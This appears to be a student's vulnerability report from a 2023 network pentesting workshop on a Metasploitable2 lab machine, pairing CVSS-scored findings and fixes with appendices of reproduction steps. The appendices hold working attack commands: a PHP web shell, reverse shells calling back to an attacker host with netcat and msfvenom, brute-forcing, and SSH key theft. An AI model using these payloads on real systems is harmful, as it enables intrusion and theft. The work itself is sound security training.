Network Pentesting (2023) - Vulnerability Report

# Network Pentesting Author: Lang Ngo Date: December 18, 2023 --- ## Table of Contents - [[#Network Pentesting Report - 2023]] - [[#Executive Summary]] - [[#Use of this Document]] - [[#Synopsis]] - [[#Scope of Work]] - [[#Constraints]] - [[#Vulnerability Findings]] - [[#Summary of Findings]] - [[#Vulnerable IRC Server]] - [[#Weak Login Credentials on FTP Server]] - [[#Samba 3.0.20-Debian Insecure Configuration]] - [[#Java RMI Server Insecure Configuration and Validation]] - [[#DistCC Daemon Unrestricted Access and Remote Command Execution]] - [[#Distributed Ruby (DRb) Remote Code Execution]] - [[#Outdated and Exploitable VSFTP Protocol]] - [[#WebDav Misconfiguration and Exploitation]] - [[#Weak Credentials in Apache Tomcat Manager]] - [[#Unsecured MySQL Database]] - [[#PostgreSQL Database Weak Login Credentials]] - [[#Telnet Weak User Credentials and Insecure SSH Key Storage]] - [[#FTP Server Anonymous Access and Potential Data Exposure]] - [[#SMTP User Enumeration]] - [[#Appendix]] - [[#Appendix 1]] - [[#Appendix 2]] - [[#Appendix 3]] - [[#Appendix 4]] - [[#Appendix 5]] - [[#Appendix 6]] - [[#Appendix 7]] - [[#Appendix 8]] - [[#Appendix 9]] - [[#Appendix 10]] - [[#Appendix 11]] - [[#Appendix 12]] - [[#Appendix 13]] # Executive Summary ## Use of this Document This report is intended to provide detail and context on security issues discovered during Network Pentesting Workshop (2023). This report provides technical descriptions and security weaknesses found on the exercise and course materials provided. ## Synopsis For training and learning purposes, the engagement of a Metasploitable2 Server with vulnerabilities was provided for the Network Pentesting Workshop(2023). Engagement of the exercises was performed by Lang Ngo. The report will focus on security vulnerabilities, exploits, and mitigations; all within the training environment. It will include issues with security, vulnerabilities and recommendations of the testing environment. All vulnerabilities found were intentional and for demonstration purposes. ## Scope of Work All following vulnerabilities were conducted within various virtual machines, in the same network. ## Constraints 1. The assessment was performed after the Network Pentesting Workshop course 2. Scope of the assessments was the lab environment and information provided. ## Vulnerability Findings The severity for each finding is measured based on CVSSv4.0 metrics: https://www.first.org/cvss/calculator/4.0 # Summary of Findings | Vulnerability | Severity | CVSS Score | |--------------|-----------|------------| | Vulnerable IRC Server | Critical | 9.9 | | Weak Login Credentials on FTP Server | Critical | 9.9 | | Samba 3.0.20-Debian Insecure Configuration | Critical | 9.3 | | JAVA RMI Service | Critical | 9.3 | | DistCC Daemon Service on Port 3632 | Critical | 9.3 | | Distributed Ruby (DRb) | Critical | 9.3 | | Outdated and Exploitable VSFTP Protocol | Critical | 9.1 | | WebDav Misconfiguration and Exploitation | Critical | 9.1 | | Weak Credentials in Apache Tomcat Manager | High | 8.8 | | Unsecured MySQL Database | High | 8.8 | | PostgreSQL Database Weak Login Credentials | High | 8.8 | | Telnet Service and Compromised SSH Private Key | High | 8.6 | | Anonymous FTP Login | Medium | 6.9 | | SMTP User Enumeration | Medium | 6.9 | # Vulnerable IRC Server | Field | Description | | ------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | UnrealIRCd 3.2.8.1 Backdoor Root Access | | CVSS Score | 9.9 | | Severity | Critical | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N | | Target | 10.0.1.3 port 6667 - UnrealIRCd 3.2.8.1 | | Impact | Full System Compromise : Unauthorized root access allows complete control over the system, leading to potential data theft, system manipulation, and deployment of further malicious activities. Data Integrity Risk : Root access compromises the integrity of all data and processes on the system. Network Propagation : The compromised system can be used as a launchpad for further attacks within the network. | | Details | The exploit took advantage of a backdoor vulnerability (as classified under CWE-506). This unauthorized entry point allowed attackers to bypass standard authentication procedures, gaining high-level privileges and control over the system. | | Reproduction Steps | [[#Appendix 13]] | | Recommendation | Immediate Update or Replacement: Upgrade UnrealIRCd to a non-vulnerable version or replace it with a different IRC server software that is secure. | | References | - https://www.unrealircd.org/docs/Upgrading - https://cwe.mitre.org/data/definitions/506.html | --- # Weak Login Credentials on FTP Server | Field | Description | | ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | Weak Login Credentials on FTP Server | | CVSS Score | 9.9 | | Severity | Critical | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N | | Target | 10.0.1.3 port 21 FTP Service | | Impact | Unauthorized Access : Weak credentials can be easily brute-forced, allowing unauthorized users to gain access to the FTP server. This could lead to unauthorized data access, modification, or deletion. Data Breach Risk : Once inside the FTP server, an attacker could potentially access sensitive information, leading to a data breach. Potential for Further Attacks : Compromised FTP credentials might be used to gain further access into the network, especially if the same credentials are used across multiple services | | Details | The FTP server was found to possess weak login credentials, making it highly susceptible to brute-force attacks. Brute-force attacks involve an adversary systematically checking all possible password combinations until the correct one is identified. The vulnerability of these credentials to such attacks indicates a critical lack of stringent password security measures. | | Reproduction Steps | [[#Appendix 3]] | | Recommendation | Implement Strong Password Policies : Enforce the use of complex passwords that include a mix of uppercase letters, lowercase letters, numbers, and special characters. Regular Password Changes : Mandate regular password changes to prevent long-term effectiveness of stolen credentials. Account Lockout Policies : Implement account lockout policies where multiple failed login attempts temporarily disable the account, thwarting brute-force attempts. | | References | - [NIST Guidelines on Password Security](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf) - [OWASP Guide to Authentication](https://owasp.org/www-project-cheat-sheets/cheatsheets/Authentication_Cheat_Sheet.html) | | | | --- # Samba 3.0.20-Debian Insecure Configuration | Field | Description | | ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | Samba 3.0.20-Debian Insecure Configuration | | CVSS Score | 9.3 | | Severity | Critical | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 - Samba 3.0.20-Debian/SMB | | Impact | Remote Code Execution : Exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system with root privileges. Unauthorized Access : The vulnerability could enable unauthorized users to gain complete control over the affected server. Data Breach Risk : Once the server is compromised, sensitive information could be accessed, altered, or deleted. Network Compromise : The exploit could potentially be used as a pivot point for further attacks within the network | | Details | A critical vulnerability was identified in the Samba software suite, specifically version 3.0.20 running on Debian. Samba provides file and print services to SMB/CIFS clients, enabling interoperability between Unix/Linux and Windows systems. This particular version was discovered to be susceptible to remote code execution, posing significant security risks. | | Reproduction Steps | [[#Appendix 5]] | | Recommendation | Immediate Update: Upgrade the Samba server to the latest version where this vulnerability has been patched. Access Control and Firewalls : Restrict access to SMB ports (e.g., 139, 445) from untrusted networks and implement strict firewall rules. | | References | - Samba Official Website: [Samba.org](https://www.samba.org/) - https://www.exploit-db.com/exploits/16320 | --- # Java RMI Server Insecure Configuration and Validation | Field | Description | | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | Java RMI Server Insecure Configuration and Validation | | CVSS Score | 9.3 | | Severity | Critical | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 1099 - Java RMI | | Impact | Confidentiality : Compromised, as unauthorized access allows for the disclosure of sensitive data. Integrity : Compromised, as an attacker with root access can modify system and application data. Availability : Compromised, as an attacker can disrupt services or deploy malicious software | | Details | A critical vulnerability was identified in the Java RMI (Remote Method Invocation) service. This service was found to be improperly configured and inadequately validated, leading to unauthorized root-level access. | | Reproduction Steps | [[#Appendix 9]] | | Recommendation | Patch and Update : Ensure that the Java RMI service and all related components are updated to their latest versions. Patches often address these vulnerabilities. Restrict Access : Implement firewall rules to restrict access to port 1099 to only known and trusted sources. Security Hardening : Review the configuration of the Java RMI service to apply best practices for security, including strong authentication and access controls. | | References | - https://docs.oracle.com/javase/8/docs/technotes/guides/rmi/ - http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html - https://nvd.nist.gov/vuln/detail/CVE-2011-3556 | --- # DistCC Daemon Unrestricted Access and Remote Command Execution | Field | Description | | ------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | Vulnerability | DistCC Daemon Service on Port 3632 | | CVSS Score | 9.3 | | Severity | Critical | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 3632 - DistCC Daemon (distccd) | | Impact | Confidentiality : At risk due to potential unauthorized access to system files and sensitive information. Integrity : At risk as the attacker could modify system configurations and files. | | Details | The DistCC Daemon service running on the target machine is configured to allow connections from any IP address (--allow 0.0.0.0/0), making it susceptible to remote unauthorized access | | Reproduction Steps | [[#Appendix 10]] | | Recommendation | Patch and Update : Update DistCC to the latest version, which may not be vulnerable to this exploit. Restrict Network Access : Configure DistCC to only allow connections from trusted IP addresses or within a secure network segment. Firewall Configuration : Set up firewall rules to restrict access to port 3632 to known sources. Regular Auditing : Periodically audit the service and host machine for unauthorized access or modifications. Least Privilege Principle : Run services with the minimum necessary permissions to reduce the impact of a successful exploit. Monitor and Log : Implement monitoring and logging to detect unusual activities related to the DistCC service. | | References | - https://www.distcc.org/ - https://nvd.nist.gov/vuln/detail/CVE-2004-2687 | --- # Distributed Ruby (DRb) Remote Code Execution | Field | Description | | ------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | Distributed Ruby (DRb) Remote Code Execution | | CVSS Score | 9.3 | | Severity | Critical | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 8787 - Distributed Ruby (DRb) | | Impact | Unauthorized Code Execution : The vulnerability allows remote attackers to execute arbitrary code on the target machine, compromising its security. System Compromise : Successful exploitation can lead to a complete system takeover, allowing attackers to manipulate or destroy data, create new accounts with full user rights, and use the compromised machine as a foothold in the network. Data Breach and Leakage : Sensitive data on the target machine and network can be accessed, exfiltrated, or manipulated. | | Details | The target machine running the Distributed Ruby service on port 8787 is vulnerable to remote code execution. | | Reproduction Steps | [[#Appendix 14]] | | Recommendation | Immediate Patching : Apply any available patches or updates to the DRb service to rectify known vulnerabilities. Service Configuration Review : Review and harden the DRb service configuration to prevent unauthorized access. Network Segmentation and Firewalling : Restrict access to the DRb service from the network using firewalls or network segmentation techniques. | | References | - Exploit-DB Entry: https://www.exploit-db.com/exploits/17031 - DRb Security Best Practices: [Ruby DRb Documentation](https://www.ruby-doc.org/stdlib-2.7.0/libdoc/drb/rdoc/DRb.html) | --- # Outdated and Exploitable VSFTP Protocol | Field | Description | | ------------------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | Outdated and Exploitable VSFTP Protocol | | CVSS Score | 9.1 | | Severity | Critical | | CVSS URL | CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:L | | Target | 10.0.1.3 port 21 - FTP (vsftpd version 2.3.4) | | Impact | It allows an attacker to gain unauthorized access and control over the affected server. Access is at the level of the user under which vsftpd service is running. The breach of confidentiality and integrity can lead to significant data loss. Sensitive information stored on the server can be stolen or manipulated. | | Details | This vulnerability pertains to a specific version of **`vsftpd`**, a widely-used FTP server for UNIX-like systems, which is known to have a critical security flaw. The **`vsftpd`** version running on the Metasploitable2 server was identified as vulnerable to external attacks. **Vulnerable Version**: 2.3.4 The security flaw in this version of **`vsftpd`** exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011. | | Reproduction Steps | [[#Appendix 1]] | | Recommendation | Patch or upgrade the **`vsftpd`** service to a non-vulnerable/latest version. Review and enhance the FTP server configurations to bolster security. Options include disabling unnecessary services, employing strong authentication methods, and implementing secure protocols like FTPS or SFTP. | | References | https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ https://www.exploit-db.com/exploits/49757 | --- # WebDav Misconfiguration and Exploitation | Field | Description | | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | WebDav Misconfiguration and Exploitation | | CVSS Score | 9.1 | | Severity | Critical | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 80 WebDav Service | | Impact | Server Compromise : The vulnerability in WebDav protocol implementation allows remote attackers to execute arbitrary code, potentially leading to full server compromise. Unauthorized Data Access : Attackers can access sensitive data, modify or delete files hosted on the server, impacting the confidentiality, integrity, and availability of data. Network Lateral Movement : The exploit could serve as a gateway for further attacks within the internal network, escalating the security incident's scope. | | Details | WebDav, an extension of HTTP, facilitates collaborative file editing and management on remote servers. The identified misconfiguration in this protocol allows unauthorized file uploads, including executable scripts, leading to severe security implications. | | Reproduction Steps | [[#Appendix 4]] | | Recommendation | Restrict File Uploads: Limit the types of files that can be uploaded via WebDAV. Disallow executable and script file uploads (e.g., .php , .exe , .bat ) to prevent execution of unauthorized code. Implement file upload filtering mechanisms on the server side. WebDAV Configuration Review and Hardening: Conduct a comprehensive review of the WebDAV configuration settings. Ensure that only authorized users have write access. Utilize the principle of least privilege: restrict user permissions to the minimum required for their role. Regular Software Updates: Ensure that the WebDAV service and the underlying web server software are regularly updated to the latest versions. Apply security patches promptly to address known vulnerabilities. Implement Access Controls and Authentication Mechanisms: Use strong authentication methods for WebDAV access, such as two-factor authentication. Implement network-level access controls to restrict access to the WebDAV service to trusted IP addresses only. | | References | - "Web Distributed Authoring and Versioning (WebDAV)" by IETF, RFC 4918: [WebDAV RFC](https://tools.ietf.org/html/rfc4918) - "Security Considerations for WebDAV" by OWASP: [OWASP WebDAV Security](https://owasp.org/www-project-top-ten/) | --- # Weak Credentials in Apache Tomcat Manager | Field | Description | | ------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | Weak Credentials in Apache Tomcat Manager | | CVSS Score | 8.8 | | Severity | High | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 8180 - Apache Tomcat 5.5 | | Impact | An attacker with access to the Tomcat Manager application can deploy malicious web applications, which could lead to remote code execution, data leakage, or even complete takeover of the server, especially if the Tomcat process runs with high privileges. | | Details | The Tomcat Manager application was found to be protected by weak credentials, which allowed unauthorized access to the management interface. This vulnerability was exploited to deploy a reverse shell, enabling remote command execution as the Tomcat user. | | Reproduction Steps | [[#Appendix 8]] | | Recommendation | Update Apache Tomcat to the latest stable version to fix known vulnerabilities. Implement strong, unique credentials for the Tomcat Manager and restrict access to trusted users only. Consider additional layers of security, such as network firewalls or access control lists (ACLs), to limit access to the Tomcat Manager interface. Regularly audit and review logs for any unauthorized access attempts or other suspicious activities. Conduct regular vulnerability assessments to identify and remediate security weaknesses. | | References | - https://tomcat.apache.org/upgrading.html - https://tomcat.apache.org/security-5.html | --- # Unsecured MySQL Database | Field | Description | | ------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | Vulnerability | Unsecured MySQL Database | | CVSS Score | 8.8 | | Severity | High | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 3306 - MySQL Database | | Impact | Data Breach Risk : Unauthorized access could lead to sensitive data exposure. Integrity Threat : Potential for data alteration or deletion without oversight. Service Disruption : Possibility of service interruption due to malicious activities | | Details | The MySQL service on the target machine is configured to allow connections without proper authentication. By using a simple command mysql -h 10.0.1.3 --ssl=0 -u root -p with an empty password, unauthorized users can gain full access to the MySQL database. | | Reproduction Steps | [[#Appendix 11]] | | Recommendation | Immediate Password Setup : Set a strong, unique password for the root user and all accounts with database access. Review User Accounts : Audit existing accounts in the database for unauthorized users. Implement SSL/TLS : Enforce encrypted connections to the database to protect data in transit. Regular Audits : Regularly audit database access logs for unauthorized access attempts. Access Controls : Restrict database access to authorized IP addresses or VPNs. Security Patching : Ensure MySQL is updated to the latest version with all security patches applied. | | References | https://dev.mysql.com/doc/mysql-security-excerpt/5.7/en/ | --- # PostgreSQL Database Weak Login Credentials | Field | Description | | ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | PostgreSQL Database Weak Login Credentials | | CVSS Score | 8.8 | | Severity | High | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 5432 - PostgreSQL Database | | Impact | Data Exposure : Unauthorized access could lead to exposure of sensitive data stored in the database. Database Manipulation : Potential for data alteration, addition, or deletion by unauthorized users. System Compromise : Weak database credentials can be a gateway for further exploitation and system compromise. | | Details | The PostgreSQL service on the target machine is configured with weak, default login credentials. This allows attackers to easily gain unauthorized access to the database, posing a significant risk to data integrity and security. | | Reproduction Steps | [[#Appendix 12]] | | Recommendation | Immediate Password Change : Change the default credentials to strong, unique usernames and passwords for all database accounts. Credential Policy : Establish a policy for regular password updates and complexity requirements. Audit User Accounts : Review all user accounts in the PostgreSQL database for unauthorized or unnecessary access privileges. | | References | - PostgreSQL Security: https://www.postgresql.org/support/security/ - CWE-798: Use of Hard-coded Credentials: https://cwe.mitre.org/data/definitions/798.html | --- # Telnet Weak User Credentials and Insecure SSH Key Storage | Field | Description | | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | Telnet Weak User Credentials and Insecure SSH Key Storage | | CVSS Score | 8.6 | | Severity | High | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 23 - Telnet 10.0.1.3 port 22 - SSH | | Impact | Successful exploitation of these vulnerabilities allows an attacker to gain unauthorized access to the system with the privileges of the compromised user. This can lead to further exploitation such as privilege escalation, data theft, and persistent access to the system. | | Details | The Telnet service on the target system is configured to allow connections without secure authentication methods, which led to the brute-forcing of the msfadmin user's credentials. Additionally, the server is configured to store SSH private keys in a location accessible by the compromised user. | | Reproduction Steps | [[#Appendix 7]] | | Recommendation | Disable the Telnet service if it's not necessary or ensure it requires secure authentication methods if it must remain operational. Review the server's security policies to restrict access to sensitive files, such as private SSH keys. Enforce the use of strong, unique passwords for all user accounts and implement account lockout policies to mitigate brute force attacks. | | References | https://www.sans.org/white-papers/1180/ | --- # FTP Server Anonymous Access and Potential Data Exposure | Field | Description | | ------------------ | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | FTP Server Anonymous Access and Potential Data Exposure | | CVSS Score | 6.9 | | Severity | Medium | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N | | Target | 10.0.1.3 port 21 FTP Service | | Impact | Unauthorized Data Access: Anonymous FTP login vulnerability allows unauthenticated users to access the FTP server. This could lead to unauthorized viewing, downloading, or uploading of files, depending on the permissions set on the server. Data Leakage: Sensitive information could be exposed if stored in directories accessible via anonymous login. Potential for Further Exploitation: If write permissions are enabled, this vulnerability could be exploited to upload malicious files, potentially leading to further compromise of the system. | | Details | The FTP server was found to allow anonymous logins. Anonymous FTP is a setting on FTP servers that permits any user to access shared files on the server without providing a username or password. This can be useful for public file sharing but poses significant security risks when sensitive data is involved or if write permissions are mistakenly granted. | | Reproduction Steps | [[#Appendix 2]] | | Recommendation | Disable Anonymous Logins: Unless there is a specific requirement for anonymous access, it should be disabled. This can typically be configured in the FTP server settings. Implement Access Controls: If anonymous login is necessary, restrict the permissions to read-only and limit the accessible directories. Regular Audits: Conduct regular audits of FTP server settings to ensure that anonymous access is not inadvertently enabled. Use Secure FTP Versions: Consider using secure FTP variants like SFTP (SSH File Transfer Protocol) or FTPS (FTP Secure) that provide better authentication mechanisms. | | References | https://www.cerberusftp.com/blog/eight-essential-tips-for-securing-an-ftp-or-sftp-server/ | --- # SMTP User Enumeration | Field | Description | | ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Vulnerability | SMTP User Enumeration | | CVSS Score | 6.9 | | Severity | Medium | | CVSS URL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N | | Target | 10.0.1.3 port 25 - SMTP | | Impact | The successful enumeration of users on an SMTP server can lead to a range of impacts: It may aid attackers in mounting more targeted attacks, such as spear-phishing campaigns. It could facilitate brute-force password attacks on known user accounts. Having a list of valid users can also help in crafting other attacks that rely on user names, such as attempting to access other services where the same usernames may be used. | | Details | An SMTP User Enumeration allows an unauthorized attacker to obtain a list of valid usernames on the SMTP service, which can be used for further attacks or exploitation. The usernames obtained during the enumeration process include system and service accounts that could potentially have elevated privileges within the system or network. | | Reproduction Steps | [[#Appendix 6]] | | Recommendation | Disable verbose SMTP responses to prevent the server from disclosing information about user accounts. Implement rate limiting and account lockout policies to mitigate brute-force attacks. Consider deploying SMTP authentication mechanisms to protect against unauthorized use of the SMTP service. Regularly audit and review accounts, ensuring that only necessary accounts exist and are active. Patch and update the SMTP server software to the latest version to address any known vulnerabilities. | | References | https://www.kali.org/tools/smtp-user-enum/ | --- # Appendix ## Appendix 1 Used Metasploit Framework ```bash msfconsole ``` ```bash use exploit/unix/ftp/vsftpd_234_backdoor ``` ```bash use ``` ```bash options ``` ![[Attachments/08954202d38e07054902952077abbb22_MD5.png]] ```bash set RHOSTS 10.0.1.3 ``` ```bash run ``` Successfully Gained Root Access ![[Attachments/a6c77d853183295b99a524ac67fb9bd1_MD5.png]] ## Appendix 2 **Anonymous FTP login is available** Connect to the FTP server at **`10.0.1.3`** with the command: ```bash ftp 10.0.1.3 ``` Use `anonymous` as the username and anything for the password. Access granted without proper authentication validates the vulnerability. ![[Attachments/740d77a1a0a7facf3a4d06b369c6957b_MD5.png]] ## Appendix 3 Bruteforced FTP login credentials Using Hydra ```bash hydra -l msfadmin -P passwords.txt [ftp://10.0.1.3:2121](ftp://10.0.1.3:2121) -V ``` ![[Attachments/e9170bd5859d9fe277ab261196e7452f_MD5.png]] Used the bruteforced login credentials and accessed the ftp: ![[Attachments/cf308dfea15e502a1b7c59977b2af54b_MD5.png]] ## Appendix 4 used command curl to find http vulnerabilities ```bash curl 10.0.1.3:80 ``` ![[Attachments/f8a296f1ac27f6c36c9bbcbafb71767e_MD5.png]] Running davtest to see if uploading several files with different extensions is possible and check if the extension can be executable. ```bash davtest -url [http://10.0.1.3:80/dav](http://10.0.1.3/dav) ``` ![[Attachments/068842582e75ea63911c38b0d95c0e15_MD5.png]] Results show that it is possible to upload a php file and execute it. Created a simple php file on the server named webshell.php ```bash <?php echo system($_GET["cmd"]); ?> ``` Used `cadaver` to upload the php file to the server. ```bash cadaver http://10.0.1.3/dav ``` ![[Attachments/6f9affa386df3995f7ba6d6ac588e538_MD5.png]] Access and execute the php file that was put into the dav adding and passing a simple whoami command ```bash curl http://10.0.1.3/dav/webshell.php?cmd=whoami ``` Now that we know a simple web php shell works, we can now use a full php reverse shell Access and execute the php file that was put into the dav adding and passing a simple whoami command ```bash curl http://10.0.1.3/dav/webshell.php?cmd=whoami ``` Now that we know a simple web php shell works, we can now use a full php reverse shell [https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) ```bash wget [https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) ``` Edit the ip address and the port. Use cadaver again to upload the php file to the server ```bash cadaver http://10.0.1.3/dav ``` ![[Attachments/7b6a2e9359f5ff9a6e8fb20cd753e516_MD5.png]] Create a listener for port 443 ```bash nc -lvnp 443 ``` se curl to execute the grev.php ```bash curl http://10.0.1.3/dav/grev.php ``` Successful Reverse Shell ![[Attachments/87f4cc8b6361da276dddfc8d3ae0a70d_MD5.png]] Upgraded Shell to Bash Shell ![[Attachments/5c97fb487a865b580e9811a8933816fc_MD5.png]] ## Appendix 5 Enumerated version of SMB ```bash rpcclient ``` ```bash enum4linux 10.0.1.3 ``` ![[Attachments/bf2ab63d139736eff7ab2a9d4cdd0d3f_MD5.png]] Current version is Unix (Samba 3.0.20-Debian) Use msfconsole and run: ```bash exploit/multi/samba/usermap_script ``` Use: ```bash show options ``` and then set the RHOSTS to the target machine in this case 10.0.1.3 ```bash set RHOSTS 10.0.1.3 ``` ![[Attachments/e2d8f7872124273e1b449248cc1e050e_MD5.png]] ```bash run ``` ![[Attachments/bddb6000e77502b5900295a4c4428c20_MD5.png]] Result is root access on the machine. Another method is to use `smbclient` ```bash smbclient //10.0.1.3/IPC$ ``` then setup a listener in another terminal tab ```bash nc -lvnp 4444 ``` then use a reverse shell ```bash logon "/=nc '10.0.1.1' 4444 -e /bin/bash" ``` ![[Attachments/19a131e51a943e5b77a88da2c3cf87a1_MD5.png]] ## Appendix 6 Load and Use `msfconsole` ```bash search smtp user enum ``` ```bash auxiliary/scanner/smtp/smtp_enum ``` ![[Attachments/bd5833ec56bde17df017bffa5d2bed0b_MD5.png]] ```bash use 1 ``` ![[Attachments/a9abe8e29ccfcb3f711f23b7d86ccd70_MD5.png]] ```bash set RHOSTS 10.0.1.3` ``` ```bash run ``` ![[Attachments/df057c8f78e156d9313306d8404f9998_MD5.png]] Another Method to Enum Users ```bash smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.1.1.3 ``` The username that the modules find can be then used to test functionality when connecting to the port 25 SMTP. ```bash nc 10.0.1.3 25 ``` ```bash vrfy nobody ``` The above command verifies and checks the username nobody ## Appendix 7 Install telnet on Kali Linux with: ```bash sudo apt install telnet ``` Log into the telnet ```bash telnet 10.0.1.3 23 ``` ![[Attachments/30f33ffd1c19e67308915f295dfdf401_MD5.png]] Privilege Escalation to get SSH key for a user ![[Attachments/03c94908055dd05b4bca0d488854ce98_MD5.png]] ![[Attachments/b0f584276d91674e70cb131905834669_MD5.png]] Read the private ssh file id_rsa ```bash cat id_rsa ``` Copy the private key, and exit the telnet connection ![[Attachments/92954f9ef3b4ebf18c5a60fab7d8ef93_MD5.png]] ```bash exit ``` Create the id_rsa file on the attack machine ```bash nano id_rsa ``` modify permissions to be able to use the file ```bash chmod 600 id_rsa ``` then ssh into the vulnerable ssh user account using the private key that was created ```bash ssh -i id_rsa -oHostKeyAlgorithms=+ssh-dss [email protected] ``` ![[Attachments/0575bab10bcb7880bd76e39e9626c60e_MD5.png]] ## Appendix 8 Apache Tomcat 5 on port 8180 default credentials were used for tomcat manager at: ```bash 10.0.1.3:8180/manager ``` `tomcat` was both the username and password ![[Attachments/90b0939a3845c39d6e6e01b378a9547c_MD5.png]] Use access to tomcat manager to deploy malicious code to get reverse shell / terminal access Need to deploy a WAR file (java code deployment) Use msfvenom to generate a war file ```bash msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.1.1 LPORT=443 -f war -o shell.war ``` Using a browser upload the payload shell.war to the tomcat server ![[Attachments/f809fd67044d118e20ca76e2e96cc345_MD5.png]] Go back to the shell.war file and get the jsp file name ![[Attachments/d073a717a1650c9b810ddfbc0ddc38fe_MD5.png]] Set a listener ```bash nc -lvnp 443 ``` go to: ```bash http://10.0.1.3:8180/shell/uwtfmxbyj.jsp ``` Reverse Shell Connection established ![[Attachments/30c1a2a6ab2da4b87cf07f1c4727994f_MD5.png]] Upgrading Reverse Shell 